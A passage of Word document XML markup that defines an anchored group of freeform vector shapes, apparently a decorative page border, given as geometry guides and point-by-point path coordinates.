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33A9" w14:textId="77777777" w:rsidR="007C3349" w:rsidRPr="00C55FF5" w:rsidRDefault="007C3349" w:rsidP="007C3349">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="dotted"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C55FF5">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="dotted"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="0" allowOverlap="1" wp14:anchorId="4E07D95D" wp14:editId="1E2A9855">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-214807</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-51242</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="6315075" cy="8078558"/>
                <wp:effectExtent l="0" t="0" r="28575" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1058614971" name="Group 1058614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8078558"/>
                          <a:chOff x="5536" y="4020"/>
                          <a:chExt cx="1490" cy="2446"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1468193048" name="Freeform 5"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5598" y="4056"/>
                            <a:ext cx="89" cy="198"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 132 w 535"/>
                              <a:gd name="T1" fmla="*/ 311 h 1187"/>
                              <a:gd name="T2" fmla="*/ 148 w 535"/>
                              <a:gd name="T3" fmla="*/ 330 h 1187"/>
                              <a:gd name="T4" fmla="*/ 140 w 535"/>
                              <a:gd name="T5" fmla="*/ 389 h 1187"/>
                              <a:gd name="T6" fmla="*/ 124 w 535"/>
                              <a:gd name="T7" fmla="*/ 447 h 1187"/>
                              <a:gd name="T8" fmla="*/ 124 w 535"/>
                              <a:gd name="T9" fmla="*/ 544 h 1187"/>
                              <a:gd name="T10" fmla="*/ 132 w 535"/>
                              <a:gd name="T11" fmla="*/ 661 h 1187"/>
                              <a:gd name="T12" fmla="*/ 173 w 535"/>
                              <a:gd name="T13" fmla="*/ 797 h 1187"/>
                              <a:gd name="T14" fmla="*/ 223 w 535"/>
                              <a:gd name="T15" fmla="*/ 875 h 1187"/>
                              <a:gd name="T16" fmla="*/ 280 w 535"/>
                              <a:gd name="T17" fmla="*/ 895 h 1187"/>
                              <a:gd name="T18" fmla="*/ 330 w 535"/>
                              <a:gd name="T19" fmla="*/ 875 h 1187"/>
                              <a:gd name="T20" fmla="*/ 371 w 535"/>
                              <a:gd name="T21" fmla="*/ 797 h 1187"/>
                              <a:gd name="T22" fmla="*/ 445 w 535"/>
                              <a:gd name="T23" fmla="*/ 583 h 1187"/>
                              <a:gd name="T24" fmla="*/ 461 w 535"/>
                              <a:gd name="T25" fmla="*/ 467 h 1187"/>
                              <a:gd name="T26" fmla="*/ 453 w 535"/>
                              <a:gd name="T27" fmla="*/ 408 h 1187"/>
                              <a:gd name="T28" fmla="*/ 445 w 535"/>
                              <a:gd name="T29" fmla="*/ 350 h 1187"/>
                              <a:gd name="T30" fmla="*/ 436 w 535"/>
                              <a:gd name="T31" fmla="*/ 291 h 1187"/>
                              <a:gd name="T32" fmla="*/ 445 w 535"/>
                              <a:gd name="T33" fmla="*/ 252 h 1187"/>
                              <a:gd name="T34" fmla="*/ 461 w 535"/>
                              <a:gd name="T35" fmla="*/ 155 h 1187"/>
                              <a:gd name="T36" fmla="*/ 478 w 535"/>
                              <a:gd name="T37" fmla="*/ 77 h 1187"/>
                              <a:gd name="T38" fmla="*/ 486 w 535"/>
                              <a:gd name="T39" fmla="*/ 38 h 1187"/>
                              <a:gd name="T40" fmla="*/ 494 w 535"/>
                              <a:gd name="T41" fmla="*/ 0 h 1187"/>
                              <a:gd name="T42" fmla="*/ 502 w 535"/>
                              <a:gd name="T43" fmla="*/ 19 h 1187"/>
                              <a:gd name="T44" fmla="*/ 527 w 535"/>
                              <a:gd name="T45" fmla="*/ 116 h 1187"/>
                              <a:gd name="T46" fmla="*/ 535 w 535"/>
                              <a:gd name="T47" fmla="*/ 233 h 1187"/>
                              <a:gd name="T48" fmla="*/ 535 w 535"/>
                              <a:gd name="T49" fmla="*/ 350 h 1187"/>
                              <a:gd name="T50" fmla="*/ 519 w 535"/>
                              <a:gd name="T51" fmla="*/ 467 h 1187"/>
                              <a:gd name="T52" fmla="*/ 469 w 535"/>
                              <a:gd name="T53" fmla="*/ 681 h 1187"/>
                              <a:gd name="T54" fmla="*/ 404 w 535"/>
                              <a:gd name="T55" fmla="*/ 875 h 1187"/>
                              <a:gd name="T56" fmla="*/ 346 w 535"/>
                              <a:gd name="T57" fmla="*/ 1011 h 1187"/>
                              <a:gd name="T58" fmla="*/ 288 w 535"/>
                              <a:gd name="T59" fmla="*/ 1089 h 1187"/>
                              <a:gd name="T60" fmla="*/ 239 w 535"/>
                              <a:gd name="T61" fmla="*/ 1148 h 1187"/>
                              <a:gd name="T62" fmla="*/ 190 w 535"/>
                              <a:gd name="T63" fmla="*/ 1187 h 1187"/>
                              <a:gd name="T64" fmla="*/ 148 w 535"/>
                              <a:gd name="T65" fmla="*/ 1187 h 1187"/>
                              <a:gd name="T66" fmla="*/ 107 w 535"/>
                              <a:gd name="T67" fmla="*/ 1148 h 1187"/>
                              <a:gd name="T68" fmla="*/ 42 w 535"/>
                              <a:gd name="T69" fmla="*/ 1050 h 1187"/>
                              <a:gd name="T70" fmla="*/ 9 w 535"/>
                              <a:gd name="T71" fmla="*/ 953 h 1187"/>
                              <a:gd name="T72" fmla="*/ 0 w 535"/>
                              <a:gd name="T73" fmla="*/ 836 h 1187"/>
                              <a:gd name="T74" fmla="*/ 0 w 535"/>
                              <a:gd name="T75" fmla="*/ 719 h 1187"/>
                              <a:gd name="T76" fmla="*/ 9 w 535"/>
                              <a:gd name="T77" fmla="*/ 603 h 1187"/>
                              <a:gd name="T78" fmla="*/ 33 w 535"/>
                              <a:gd name="T79" fmla="*/ 486 h 1187"/>
                              <a:gd name="T80" fmla="*/ 58 w 535"/>
                              <a:gd name="T81" fmla="*/ 408 h 1187"/>
                              <a:gd name="T82" fmla="*/ 91 w 535"/>
                              <a:gd name="T83" fmla="*/ 350 h 1187"/>
                              <a:gd name="T84" fmla="*/ 132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132" y="311"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="148" y="330"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="140" y="389"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="124" y="447"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="124" y="544"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="132" y="661"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="223" y="875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="330" y="875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="371" y="797"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445" y="583"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="461" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="453" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="436" y="291"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="445" y="252"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="461" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="478" y="77"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="486" y="38"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="494" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="502" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="527" y="116"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535" y="233"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="535" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="519" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="469" y="681"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="404" y="875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="346" y="1011"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="1089"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="239" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="190" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="148" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="42" y="1050"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="953"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="836"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="719"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="58" y="408"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="91" y="350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="13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584022800" name="Freeform 6"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5550" y="4173"/>
                            <a:ext cx="82" cy="211"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 362 w 493"/>
                              <a:gd name="T1" fmla="*/ 934 h 1265"/>
                              <a:gd name="T2" fmla="*/ 353 w 493"/>
                              <a:gd name="T3" fmla="*/ 895 h 1265"/>
                              <a:gd name="T4" fmla="*/ 337 w 493"/>
                              <a:gd name="T5" fmla="*/ 934 h 1265"/>
                              <a:gd name="T6" fmla="*/ 312 w 493"/>
                              <a:gd name="T7" fmla="*/ 954 h 1265"/>
                              <a:gd name="T8" fmla="*/ 271 w 493"/>
                              <a:gd name="T9" fmla="*/ 973 h 1265"/>
                              <a:gd name="T10" fmla="*/ 213 w 493"/>
                              <a:gd name="T11" fmla="*/ 954 h 1265"/>
                              <a:gd name="T12" fmla="*/ 164 w 493"/>
                              <a:gd name="T13" fmla="*/ 856 h 1265"/>
                              <a:gd name="T14" fmla="*/ 123 w 493"/>
                              <a:gd name="T15" fmla="*/ 720 h 1265"/>
                              <a:gd name="T16" fmla="*/ 115 w 493"/>
                              <a:gd name="T17" fmla="*/ 603 h 1265"/>
                              <a:gd name="T18" fmla="*/ 131 w 493"/>
                              <a:gd name="T19" fmla="*/ 467 h 1265"/>
                              <a:gd name="T20" fmla="*/ 156 w 493"/>
                              <a:gd name="T21" fmla="*/ 370 h 1265"/>
                              <a:gd name="T22" fmla="*/ 246 w 493"/>
                              <a:gd name="T23" fmla="*/ 195 h 1265"/>
                              <a:gd name="T24" fmla="*/ 304 w 493"/>
                              <a:gd name="T25" fmla="*/ 156 h 1265"/>
                              <a:gd name="T26" fmla="*/ 329 w 493"/>
                              <a:gd name="T27" fmla="*/ 175 h 1265"/>
                              <a:gd name="T28" fmla="*/ 345 w 493"/>
                              <a:gd name="T29" fmla="*/ 214 h 1265"/>
                              <a:gd name="T30" fmla="*/ 370 w 493"/>
                              <a:gd name="T31" fmla="*/ 234 h 1265"/>
                              <a:gd name="T32" fmla="*/ 395 w 493"/>
                              <a:gd name="T33" fmla="*/ 195 h 1265"/>
                              <a:gd name="T34" fmla="*/ 427 w 493"/>
                              <a:gd name="T35" fmla="*/ 156 h 1265"/>
                              <a:gd name="T36" fmla="*/ 460 w 493"/>
                              <a:gd name="T37" fmla="*/ 117 h 1265"/>
                              <a:gd name="T38" fmla="*/ 477 w 493"/>
                              <a:gd name="T39" fmla="*/ 97 h 1265"/>
                              <a:gd name="T40" fmla="*/ 493 w 493"/>
                              <a:gd name="T41" fmla="*/ 97 h 1265"/>
                              <a:gd name="T42" fmla="*/ 485 w 493"/>
                              <a:gd name="T43" fmla="*/ 78 h 1265"/>
                              <a:gd name="T44" fmla="*/ 444 w 493"/>
                              <a:gd name="T45" fmla="*/ 19 h 1265"/>
                              <a:gd name="T46" fmla="*/ 403 w 493"/>
                              <a:gd name="T47" fmla="*/ 0 h 1265"/>
                              <a:gd name="T48" fmla="*/ 353 w 493"/>
                              <a:gd name="T49" fmla="*/ 0 h 1265"/>
                              <a:gd name="T50" fmla="*/ 304 w 493"/>
                              <a:gd name="T51" fmla="*/ 19 h 1265"/>
                              <a:gd name="T52" fmla="*/ 205 w 493"/>
                              <a:gd name="T53" fmla="*/ 136 h 1265"/>
                              <a:gd name="T54" fmla="*/ 123 w 493"/>
                              <a:gd name="T55" fmla="*/ 292 h 1265"/>
                              <a:gd name="T56" fmla="*/ 74 w 493"/>
                              <a:gd name="T57" fmla="*/ 448 h 1265"/>
                              <a:gd name="T58" fmla="*/ 32 w 493"/>
                              <a:gd name="T59" fmla="*/ 564 h 1265"/>
                              <a:gd name="T60" fmla="*/ 8 w 493"/>
                              <a:gd name="T61" fmla="*/ 701 h 1265"/>
                              <a:gd name="T62" fmla="*/ 0 w 493"/>
                              <a:gd name="T63" fmla="*/ 798 h 1265"/>
                              <a:gd name="T64" fmla="*/ 0 w 493"/>
                              <a:gd name="T65" fmla="*/ 915 h 1265"/>
                              <a:gd name="T66" fmla="*/ 8 w 493"/>
                              <a:gd name="T67" fmla="*/ 1012 h 1265"/>
                              <a:gd name="T68" fmla="*/ 57 w 493"/>
                              <a:gd name="T69" fmla="*/ 1168 h 1265"/>
                              <a:gd name="T70" fmla="*/ 90 w 493"/>
                              <a:gd name="T71" fmla="*/ 1226 h 1265"/>
                              <a:gd name="T72" fmla="*/ 139 w 493"/>
                              <a:gd name="T73" fmla="*/ 1265 h 1265"/>
                              <a:gd name="T74" fmla="*/ 189 w 493"/>
                              <a:gd name="T75" fmla="*/ 1265 h 1265"/>
                              <a:gd name="T76" fmla="*/ 246 w 493"/>
                              <a:gd name="T77" fmla="*/ 1226 h 1265"/>
                              <a:gd name="T78" fmla="*/ 288 w 493"/>
                              <a:gd name="T79" fmla="*/ 1187 h 1265"/>
                              <a:gd name="T80" fmla="*/ 329 w 493"/>
                              <a:gd name="T81" fmla="*/ 1129 h 1265"/>
                              <a:gd name="T82" fmla="*/ 353 w 493"/>
                              <a:gd name="T83" fmla="*/ 1031 h 1265"/>
                              <a:gd name="T84" fmla="*/ 362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934"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="353" y="895"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="337" y="934"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="312" y="954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="973"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="213" y="954"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="856"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="720"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="131" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="156" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="175"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="345" y="214"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="370" y="234"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="195"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="427" y="156"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="460" y="117"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="477" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="493" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="485" y="78"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="444" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="403" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="353" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="205" y="136"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="123" y="292"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="74" y="448"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="32" y="564"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="701"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="798"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="915"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="1012"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="57" y="1168"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="90" y="1226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="139" y="1265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="189" y="1265"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="246" y="1226"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="1187"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="1129"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="353" y="1031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362"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463565807" name="Freeform 7"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm flipH="1">
                            <a:off x="5557" y="4072"/>
                            <a:ext cx="127" cy="302"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 757 w 765"/>
                              <a:gd name="T1" fmla="*/ 0 h 1809"/>
                              <a:gd name="T2" fmla="*/ 765 w 765"/>
                              <a:gd name="T3" fmla="*/ 97 h 1809"/>
                              <a:gd name="T4" fmla="*/ 749 w 765"/>
                              <a:gd name="T5" fmla="*/ 253 h 1809"/>
                              <a:gd name="T6" fmla="*/ 740 w 765"/>
                              <a:gd name="T7" fmla="*/ 370 h 1809"/>
                              <a:gd name="T8" fmla="*/ 757 w 765"/>
                              <a:gd name="T9" fmla="*/ 467 h 1809"/>
                              <a:gd name="T10" fmla="*/ 749 w 765"/>
                              <a:gd name="T11" fmla="*/ 486 h 1809"/>
                              <a:gd name="T12" fmla="*/ 740 w 765"/>
                              <a:gd name="T13" fmla="*/ 506 h 1809"/>
                              <a:gd name="T14" fmla="*/ 724 w 765"/>
                              <a:gd name="T15" fmla="*/ 486 h 1809"/>
                              <a:gd name="T16" fmla="*/ 691 w 765"/>
                              <a:gd name="T17" fmla="*/ 506 h 1809"/>
                              <a:gd name="T18" fmla="*/ 609 w 765"/>
                              <a:gd name="T19" fmla="*/ 584 h 1809"/>
                              <a:gd name="T20" fmla="*/ 510 w 765"/>
                              <a:gd name="T21" fmla="*/ 700 h 1809"/>
                              <a:gd name="T22" fmla="*/ 411 w 765"/>
                              <a:gd name="T23" fmla="*/ 875 h 1809"/>
                              <a:gd name="T24" fmla="*/ 362 w 765"/>
                              <a:gd name="T25" fmla="*/ 1031 h 1809"/>
                              <a:gd name="T26" fmla="*/ 304 w 765"/>
                              <a:gd name="T27" fmla="*/ 1206 h 1809"/>
                              <a:gd name="T28" fmla="*/ 280 w 765"/>
                              <a:gd name="T29" fmla="*/ 1420 h 1809"/>
                              <a:gd name="T30" fmla="*/ 271 w 765"/>
                              <a:gd name="T31" fmla="*/ 1537 h 1809"/>
                              <a:gd name="T32" fmla="*/ 288 w 765"/>
                              <a:gd name="T33" fmla="*/ 1634 h 1809"/>
                              <a:gd name="T34" fmla="*/ 288 w 765"/>
                              <a:gd name="T35" fmla="*/ 1693 h 1809"/>
                              <a:gd name="T36" fmla="*/ 288 w 765"/>
                              <a:gd name="T37" fmla="*/ 1712 h 1809"/>
                              <a:gd name="T38" fmla="*/ 255 w 765"/>
                              <a:gd name="T39" fmla="*/ 1732 h 1809"/>
                              <a:gd name="T40" fmla="*/ 197 w 765"/>
                              <a:gd name="T41" fmla="*/ 1712 h 1809"/>
                              <a:gd name="T42" fmla="*/ 173 w 765"/>
                              <a:gd name="T43" fmla="*/ 1712 h 1809"/>
                              <a:gd name="T44" fmla="*/ 107 w 765"/>
                              <a:gd name="T45" fmla="*/ 1751 h 1809"/>
                              <a:gd name="T46" fmla="*/ 25 w 765"/>
                              <a:gd name="T47" fmla="*/ 1790 h 1809"/>
                              <a:gd name="T48" fmla="*/ 8 w 765"/>
                              <a:gd name="T49" fmla="*/ 1809 h 1809"/>
                              <a:gd name="T50" fmla="*/ 0 w 765"/>
                              <a:gd name="T51" fmla="*/ 1809 h 1809"/>
                              <a:gd name="T52" fmla="*/ 0 w 765"/>
                              <a:gd name="T53" fmla="*/ 1790 h 1809"/>
                              <a:gd name="T54" fmla="*/ 0 w 765"/>
                              <a:gd name="T55" fmla="*/ 1732 h 1809"/>
                              <a:gd name="T56" fmla="*/ 25 w 765"/>
                              <a:gd name="T57" fmla="*/ 1537 h 1809"/>
                              <a:gd name="T58" fmla="*/ 41 w 765"/>
                              <a:gd name="T59" fmla="*/ 1401 h 1809"/>
                              <a:gd name="T60" fmla="*/ 41 w 765"/>
                              <a:gd name="T61" fmla="*/ 1342 h 1809"/>
                              <a:gd name="T62" fmla="*/ 25 w 765"/>
                              <a:gd name="T63" fmla="*/ 1206 h 1809"/>
                              <a:gd name="T64" fmla="*/ 33 w 765"/>
                              <a:gd name="T65" fmla="*/ 1109 h 1809"/>
                              <a:gd name="T66" fmla="*/ 49 w 765"/>
                              <a:gd name="T67" fmla="*/ 1109 h 1809"/>
                              <a:gd name="T68" fmla="*/ 66 w 765"/>
                              <a:gd name="T69" fmla="*/ 1128 h 1809"/>
                              <a:gd name="T70" fmla="*/ 115 w 765"/>
                              <a:gd name="T71" fmla="*/ 1148 h 1809"/>
                              <a:gd name="T72" fmla="*/ 164 w 765"/>
                              <a:gd name="T73" fmla="*/ 1148 h 1809"/>
                              <a:gd name="T74" fmla="*/ 247 w 765"/>
                              <a:gd name="T75" fmla="*/ 1070 h 1809"/>
                              <a:gd name="T76" fmla="*/ 329 w 765"/>
                              <a:gd name="T77" fmla="*/ 953 h 1809"/>
                              <a:gd name="T78" fmla="*/ 395 w 765"/>
                              <a:gd name="T79" fmla="*/ 817 h 1809"/>
                              <a:gd name="T80" fmla="*/ 461 w 765"/>
                              <a:gd name="T81" fmla="*/ 603 h 1809"/>
                              <a:gd name="T82" fmla="*/ 518 w 765"/>
                              <a:gd name="T83" fmla="*/ 370 h 1809"/>
                              <a:gd name="T84" fmla="*/ 551 w 765"/>
                              <a:gd name="T85" fmla="*/ 155 h 1809"/>
                              <a:gd name="T86" fmla="*/ 551 w 765"/>
                              <a:gd name="T87" fmla="*/ 97 h 1809"/>
                              <a:gd name="T88" fmla="*/ 551 w 765"/>
                              <a:gd name="T89" fmla="*/ 58 h 1809"/>
                              <a:gd name="T90" fmla="*/ 551 w 765"/>
                              <a:gd name="T91" fmla="*/ 19 h 1809"/>
                              <a:gd name="T92" fmla="*/ 568 w 765"/>
                              <a:gd name="T93" fmla="*/ 19 h 1809"/>
                              <a:gd name="T94" fmla="*/ 609 w 765"/>
                              <a:gd name="T95" fmla="*/ 58 h 1809"/>
                              <a:gd name="T96" fmla="*/ 658 w 765"/>
                              <a:gd name="T97" fmla="*/ 39 h 1809"/>
                              <a:gd name="T98" fmla="*/ 716 w 765"/>
                              <a:gd name="T99" fmla="*/ 0 h 1809"/>
                              <a:gd name="T100" fmla="*/ 757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757" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="765" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="749" y="253"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="740" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="757" y="467"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="749" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="740" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="724" y="486"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="691" y="506"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="609" y="584"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="510" y="700"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="411" y="875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="362" y="1031"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="304" y="1206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="280" y="1420"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="271" y="1537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="1634"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="1693"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="288" y="1712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="255" y="1732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="197" y="1712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="173" y="1712"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="107" y="1751"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="1790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8" y="1809"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1809"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1790"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="1732"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="1537"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="1401"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="41" y="1342"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="25" y="1206"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="33" y="1109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="49" y="1109"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="66" y="1128"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="115" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="164" y="1148"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="247" y="1070"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="329" y="953"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="395" y="817"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="461" y="603"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="518" y="370"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="155"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="97"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="551" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="568" y="19"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="609" y="58"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="658" y="39"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="716" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
